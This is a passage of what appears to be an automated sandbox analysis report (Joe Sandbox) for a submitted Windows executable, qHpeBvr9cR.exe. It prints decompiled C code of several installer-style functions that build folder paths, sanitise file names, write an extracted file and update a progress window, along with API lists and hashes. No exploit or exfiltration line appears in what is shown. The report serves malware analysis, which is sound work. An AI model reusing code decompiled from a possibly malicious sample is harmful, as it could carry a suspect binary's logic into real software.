				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42375c - 4 + _t36 * 4);
				}
				_t74 =  *0x423fb8 + _t36;
				_t37 = 0x422f20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422f20;
				if(_a4 - 0x422f20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422f20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405C59(_t86,  *0x423f88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405F5D(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x424004;
						if( *0x424004 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f84;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405D1D(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405CFB(_a4, _t37);
			}




























                                              0x00405d1d
                                              0x00405d1d
                                              0x00405d1d
                                              0x00405d23
                                              0x00405d28
                                              0x00405d39
                                              0x00405d39
                                              0x00405d44
                                              0x00405d46
                                              0x00405d4b
                                              0x00405d4e
                                              0x00405d4f
                                              0x00405d56
                                              0x00405d58
                                              0x00405d5e
                                              0x00405d61
                                              0x00405d61
                                              0x00405f3a
                                              0x00405f3a
                                              0x00405f3e
                                              0x00000000
                                              0x00000000
                                              0x00405d6e
                                              0x00405d74
                                              0x00000000
                                              0x00000000
                                              0x00405d7a
                                              0x00405d7b
                                              0x00405d7e
                                              0x00405d81
                                              0x00405f2d
                                              0x00405f37
                                              0x00405f39
                                              0x00405f39
                                              0x00405f2f
                                              0x00405f31
                                              0x00405f33
                                              0x00405f34
                                              0x00405f34
                                              0x00000000
                                              0x00405f2d
                                              0x00405d87
                                              0x00405d8b
                                              0x00405d9b
                                              0x00405d9f
                                              0x00405da6
                                              0x00405da9
                                              0x00405dad
                                              0x00405db3
                                              0x00405db6
                                              0x00405db9
                                              0x00405dbc
                                              0x00405ed7
                                              0x00405eda
                                              0x00405f0a
                                              0x00405f0d
                                              0x00405f12
                                              0x00405f16
                                              0x00405f16
                                              0x00405f1b
                                              0x00405f1c
                                              0x00405f21
                                              0x00405f24
                                              0x00405f26
                                              0x00000000
                                              0x00405f26
                                              0x00405edc
                                              0x00405edf
                                              0x00405ef4
                                              0x00405efb
                                              0x00405ee1
                                              0x00405ee8
                                              0x00405ee8
                                              0x00405f03
                                              0x00405f06
                                              0x00405ecf
                                              0x00405ed0
                                              0x00405ed0
                                              0x00000000
                                              0x00405f06
                                              0x00405dc4
                                              0x00405dc5
                                              0x00405dcb
                                              0x00405dcd
                                              0x00405de7
                                              0x00405de7
                                              0x00405dee
                                              0x00405dee
                                              0x00405df5
                                              0x00405df9
                                              0x00405df9
                                              0x00405dfa
                                              0x00405dfc
                                              0x00405e35
                                              0x00405e38
                                              0x00405e48
                                              0x00405e4b
                                              0x00405e53
                                              0x00405e59
                                              0x00405e59
                                              0x00405eb5
                                              0x00405eb5
                                              0x00405eb7
                                              0x00000000
                                              0x00000000
                                              0x00405e5d
                                              0x00405e64
                                              0x00405e65
                                              0x00405e67
                                              0x00405e81
                                              0x00405e8f
                                              0x00405e95
                                              0x00405e97
                                              0x00405eb2
                                              0x00405eb2
                                              0x00405eb2
                                              0x00000000
                                              0x00405eb2
                                              0x00405e9d
                                              0x00405ea8
                                              0x00405eae
                                              0x00405eb0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405eb0
                                              0x00405e69
                                              0x00405e6c
                                              0x00000000
                                              0x00000000
                                              0x00405e7b
                                              0x00405e7d
                                              0x00405e7f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405e7f
                                              0x00000000
                                              0x00405eb5
                                              0x00405e40
                                              0x00000000
                                              0x00405dfe
                                              0x00405e03
                                              0x00405e19
                                              0x00405e1e
                                              0x00405e21
                                              0x00405ebe
                                              0x00405ebe
                                              0x00405ec2
                                              0x00405eca
                                              0x00405eca
                                              0x00000000
                                              0x00405ec2
                                              0x00405e2b
                                              0x00405eb9
                                              0x00405eb9
                                              0x00405ebc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405ebc
                                              0x00405dfc
                                              0x00405dcf
                                              0x00405dd3
                                              0x00000000
                                              0x00000000
                                              0x00405dd5
                                              0x00405dd9
                                              0x00000000
                                              0x00000000
                                              0x00405ddb
                                              0x00405ddf
                                              0x00000000
                                              0x00405de1
                                              0x00405de1
                                              0x00000000
                                              0x00405de1
                                              0x00405ddf
                                              0x00405f44
                                              0x00405f4e
                                              0x00405f5a
                                              0x00405f5a
                                              0x00000000

                                              APIs
                                              • GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
                                              • GetSystemDirectoryA.KERNEL32 ref: 00405E40
                                              • GetWindowsDirectoryA.KERNEL32(00422F20,00000400), ref: 00405E53
                                              • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
                                              • SHGetPathFromIDListA.SHELL32(00000000,00422F20), ref: 00405E9D
                                              • CoTaskMemFree.OLE32(00000000), ref: 00405EA8
                                              • lstrcatA.KERNEL32(00422F20,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
                                              • lstrlenA.KERNEL32(00422F20,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                              • String ID: /B$ /B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 900638850-1912783298
                                              • Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                              • Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
                                              • Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                              • Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405F5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00405F5D(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040585B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                              0x00405f5f
                                              0x00405f67
                                              0x00405f7b
                                              0x00405f7b
                                              0x00405f81
                                              0x00405f8e
                                              0x00405f8e
                                              0x00405f8f
                                              0x00405f91
                                              0x00405f95
                                              0x00405f97
                                              0x00405fa0
                                              0x00405fa2
                                              0x00405fbc
                                              0x00405fc4
                                              0x00405fc4
                                              0x00405fc9
                                              0x00405fcb
                                              0x00405fcd
                                              0x00405fd1
                                              0x00405fd2
                                              0x00405fd5
                                              0x00405fdd
                                              0x00405fdf
                                              0x00405fe3
                                              0x00000000
                                              0x00000000
                                              0x00405fe9
                                              0x00405fee
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405fee
                                              0x00405ff3

                                              APIs
                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\qHpeBvr9cR.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\qHpeBvr9cR.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                              • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\qHpeBvr9cR.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-2776710969
                                              • Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                              • Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
                                              • Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                              • Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040401E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                              0x00404030
                                              0x004040c4
                                              0x00000000
                                              0x004040c4
                                              0x00404041
                                              0x00404045
                                              0x00000000
                                              0x00000000
                                              0x0040404b
                                              0x00404054
                                              0x00404057
                                              0x00404057
                                              0x0040405d
                                              0x00404063
                                              0x00404063
                                              0x0040406f
                                              0x00404075
                                              0x0040407c
                                              0x0040407f
                                              0x00404082
                                              0x00404084
                                              0x00404084
                                              0x0040408c
                                              0x00404092
                                              0x00404092
                                              0x0040409c
                                              0x004040a1
                                              0x004040a4
                                              0x004040a9
                                              0x004040ac
                                              0x004040ac
                                              0x004040bc
                                              0x004040bc
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                              • Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
                                              • Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                              • Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402692 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E00402692(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A0C(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E0040585B(_t52) == 0) {
					E00402A0C(0xffffffed);
				}
				E004059B3(_t52);
				_t27 = E004059D2(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f94;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403207(_t47);
						E004031D5(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                              0x00402692
                                              0x00402694
                                              0x004026a0
                                              0x004026a3
                                              0x004026ad
                                              0x004026b1
                                              0x004026b1
                                              0x004026b7
                                              0x004026c4
                                              0x004026cc
                                              0x004026cf
                                              0x004026d5
                                              0x004026e3
                                              0x004026e8
                                              0x004026ec
                                              0x004026ef
                                              0x004026f8
                                              0x00402704
                                              0x00402708
                                              0x0040270b
                                              0x00402715
                                              0x00402734
                                              0x0040271c
                                              0x00402721
                                              0x00402729
                                              0x0040272c
                                              0x00402731
                                              0x00402731
                                              0x0040273b
                                              0x0040273b
                                              0x0040274d
                                              0x00402754
                                              0x00402766
                                              0x00402766
                                              0x0040276c
                                              0x0040276c
                                              0x00402777
                                              0x00402778
                                              0x0040277c
                                              0x00402780
                                              0x00402786
                                              0x00402786
                                              0x0040278d
                                              0x0040217a
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
                                              • GlobalFree.KERNEL32 ref: 0040273B
                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
                                              • GlobalFree.KERNEL32 ref: 00402754
                                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                              • String ID:
                                              • API String ID: 3294113728-0
                                              • Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                              • Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
                                              • Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                              • Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404FE7 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00404FE7(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424034;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
					}
					_t26 = lstrlenA(0x41fd58);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd58;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd58)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd58, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                              0x00404fed
                                              0x00404ff9
                                              0x00404ffc
                                              0x00405002
                                              0x0040500e
                                              0x00405011
                                              0x00405014
                                              0x0040501a
                                              0x0040501a
                                              0x00405020
                                              0x00405028
                                              0x0040502b
                                              0x00405048
                                              0x0040504c
                                              0x00405055
                                              0x00405055
                                              0x0040505f
                                              0x00405068
                                              0x00405074
                                              0x0040507b
                                              0x0040507f
                                              0x00405082
                                              0x00405095
                                              0x004050a3
                                              0x004050a3
                                              0x004050a7
                                              0x004050a9
                                              0x004050ac
                                              0x00000000
                                              0x004050ac
                                              0x0040502d
                                              0x00405035
                                              0x0040503d
                                              0x00405043
                                              0x00000000
                                              0x00405043
                                              0x0040503d
                                              0x0040502b
                                              0x004050b6

                                              APIs
                                              • lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                              • lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                              • lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                              • SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2531174081-0
                                              • Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                              • Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
                                              • Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                              • Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402BE9(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41712c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41712c = 0;
					return _t15;
				}
				__eflags =  *0x41712c; // 0x0
				if(__eflags != 0) {
					return E004060C3(0);
				}
				_t6 = GetTickCount();
